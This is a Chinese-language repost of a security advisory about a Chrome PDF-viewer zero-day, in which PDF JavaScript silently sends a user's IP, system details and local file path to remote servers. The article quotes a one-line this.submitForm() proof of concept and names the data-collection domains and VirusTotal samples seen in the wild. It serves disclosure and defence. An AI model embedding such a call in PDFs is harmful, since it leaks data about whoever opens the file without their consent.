Chrome 被曝 0day!通过 PDF 文件即可窃取用户信息

释放双眼,带上耳机,听听看~!

点击上方“凌天实验室”可订阅哦!

作为临时的“变通措施”,研究人员建议受影响用户在 Chrome 修复问题之前,使用其它的 PDF 查看器,或者在 Chrome 中打开 PDF 文档时断网。


 
详细分析 

研究人员指出,在 Adobe Reader 中打开这些样本时,显示“没问题”,但在Chrome 本地打开时会产生可疑的出站流量。本文将以其中一种典型的样本作为例子详细分析:

https://www.virustotal.com/#/file/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/detection

(首次提交时间2017年10月1日,文件名为 “honduras-bginfo.pdf”

EdgeSpot 公司表示,公司引擎将样本检测为“潜在的 0day 攻击 (Google Chrome),个人信息泄漏”,如下图所示:

https://edgespot.io/analysis/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/


在本地磁盘通过 Chrome 打开时,如下所示。


通过捕获后台流量,研究人员观测到一些出站流量,且数据被发送至域名 “readnotify.com”,而并未出现用户交互,换句话说,数据是在未获得用户同意的情况下静默发送出去的。


该流量是一个 HTTP POST 数据包,如下 Wireshark 窗口所示。


该 PDF 样本在用户查看时,在后台“发回通信”。

HTTP 数据包显示,用户的如下信息可能遭恶意发送人员收集:

  • 用户的公共 IP 地址

  • 操作系统、Chrome 版本等(在 HTTP POST 头部)

  • PDF 文件在用户计算机上的完整路径(在 HTTP POST 有效负载中)

近期,研究人员还发现了一些其他的 PDF “发回通信”的 0day 问题,包括在去年11月发现并披露的问题(ITW 0day 攻击),以及最近发现的一个案例。但在这次所观测到的案例中,新的样本具有一些不同之处:

  • 该样本影响 Google Chrome (作为本地 PDF 查看器的情况),不影响 Adobe Reader。

  • 该样本不允许 NTLM 窃取,但会暴露用户的操作系统信息和本地磁盘上文件的路径。

分析该样本后,研究人员在 stream-1 中发现了一些可疑的 Javascript 代码。


混淆代码后,研究人员发现问题的根因在于 “this.submitForm()” PDF Javascript API。研究人员以最小的 PoC 进行了测试,简单的 API 调用如 “this.submitForm(‘http://google.com/test’)” 将导致 Chrome 将个人数据发送给 google.com。

 报告时间轴 

漏洞报告的时间轴如下:

  • 2018-12-26:向谷歌报告研究结果。

  • 2019-02-12:检测到更多样本。

  • 2019-02-14:和 Chrome 团队进行多次沟通后,获悉该问题将在4月末修复。通知 Chrome 团队关于这篇文章的发布情况。

  • 2019-02-26:本文发布。

补丁尚无

研究人员指出,之所以在补丁发布前公布自己的研究成果,目的是为了更好地让受影响用户获悉/警觉存在的潜在风险,因为补丁尚未发布,而已出现在野利用/样本。

作为临时的“变通措施”,研究人员建议受影响用户在 Chrome 修复问题之前,使用其它的 PDF 查看器,或者在 Chrome 中打开 PDF 文档时断网。

样本

研究人员表示,将首个样本告知谷歌后,还找到了更多和该漏洞相关的样本。他们共找到了两类样本。第一类是具有类似在野文件名称的样本将数据发送给域名“readnotify.com”且所有的样本都于2017年10月1日出现在 VirusTotal 上,这可能表明它们源自同一个来源。它们是:

  • https://www.virustotal.com/#/file/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/detection

  • https://www.virustotal.com/#/file/286ed6d0261aed1115e06e2e8cf0af840297241e9dc9494a496a2c8b75457749/detection

  • https://www.virustotal.com/#/file/a21a4fcc75cd20a0965f1673b98c0dd688711c40cbabf92a5e5cd1f31a7ac684/detection

  • https://www.virustotal.com/#/file/1d151793f521419c1470079a37b1e37b8b59a5b69a5506f1d0dbee6f3995b25d/detection

  • https://www.virustotal.com/#/file/0c3e8efd667f7ff1549bfd2a4498105cb2607314d73b7105f4c1d747d7341090/detection

  • https://www.virustotal.com/#/file/fb56efe75f3b4509d5a2e0655536d9dab121798d92b8660121bd4691265a87e3/detection

  • https://www.virustotal.com/#/file/622624d6f161b7d2fa7859d46792dd6bb49024b432b04106b1818510a2037689/detection


第二类样本只有一个,在2018年9月26日出现在 VirusTotal 上,它收集个人信息并将其发送至:

“http://zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net”

  • https://www.virustotal.com/#/file/0cc1234c981806dd22e0e98e4be002e8df8d285b055e7f891ff8e91af59aee1e/detection


凌天
实验室

凌天实验室,是安百科技旗下针对应用安全领域进行攻防研究的专业技术团队,其核心成员来自原乌云创始团队及社区知名白帽子,团队专业性强、技术层次高且富有实战经验。实验室成立于2016年,发展至今团队成员已达35人,在应用安全领域深耕不辍,向网络安全行业顶尖水平攻防技术团队的方向夯实迈进。

本文源自微信公众号:凌天实验室

人已赞赏
安全工具

CVE-2018-2025[0-3] WinRAR 代码执行漏洞预警

2019-10-14 14:02:12

安全工具

WordPress 5.0.0远程代码执行

2019-10-14 14:02:20

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索